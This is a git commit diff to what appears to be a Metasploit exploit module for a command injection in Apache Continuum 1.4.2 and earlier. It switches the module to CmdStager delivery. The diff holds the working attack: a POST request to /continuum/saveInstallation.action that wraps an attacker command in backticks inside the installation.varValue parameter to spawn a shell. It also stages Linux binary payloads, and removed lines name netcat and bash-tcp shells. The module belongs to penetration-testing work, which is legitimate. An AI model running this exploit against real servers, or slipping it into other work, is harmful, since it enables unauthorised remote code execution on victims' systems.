Convert to CmdStager

wvu · wvu · commit ec1248d7af7a · 2016-06-10T20:42:01.000-05:00
diff --git a/modules/exploits/linux/http/apache_continuum_cmd_exec.rb b/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
@@ -8,37 +8,32 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'            => 'Apache Continuum Arbitrary Command Execution',
-      'Description'     => %q{
+      'Name'           => 'Apache Continuum Arbitrary Command Execution',
+      'Description'    => %q{
         This module exploits a command injection in Apache Continuum <= 1.4.2.
         By injecting a command into the installation.varValue POST parameter to
         /continuum/saveInstallation.action, a shell can be spawned.
       },
-      'Author'          => [
+      'Author'         => [
         'David Shanahan', # Proof of concept
         'wvu'             # Metasploit module
       ],
-      'References'      => [
+      'References'     => [
         %w{EDB 39886}
       ],
-      'DisclosureDate'  => 'Apr 6 2016',
-      'License'         => MSF_LICENSE,
-      'Platform'        => 'unix',
-      'Arch'            => ARCH_CMD,
-      'Privileged'      => false,
-      'Payload'         => {
-        'Compat'        => {
-          'PayloadType' => 'cmd cmd_bash',
-          'RequiredCmd' => 'generic netcat bash-tcp'
-        }
-      },
-      'Targets'         => [
+      'DisclosureDate' => 'Apr 6 2016',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Privileged'     => false,
+      'Targets'        => [
         ['Apache Continuum <= 1.4.2', {}]
       ],
-      'DefaultTarget'   => 0
+      'DefaultTarget'  => 0
     ))
 
     register_options([
@@ -62,13 +57,18 @@ def check
   end
 
   def exploit
+    print_status('Injecting CmdStager payload...')
+    execute_cmdstager(flavor: :bourne)
+  end
+
+  def execute_command(cmd, opts = {})
     send_request_cgi(
       'method'    => 'POST',
       'uri'       => '/continuum/saveInstallation.action',
       'vars_post' => {
         'installation.name'     => Rex::Text.rand_text_alpha(8),
         'installation.type'     => 'jdk',
-        'installation.varValue' => '`' + payload.encoded + '`'
+        'installation.varValue' => '`' + cmd + '`'
       }
     )
   end
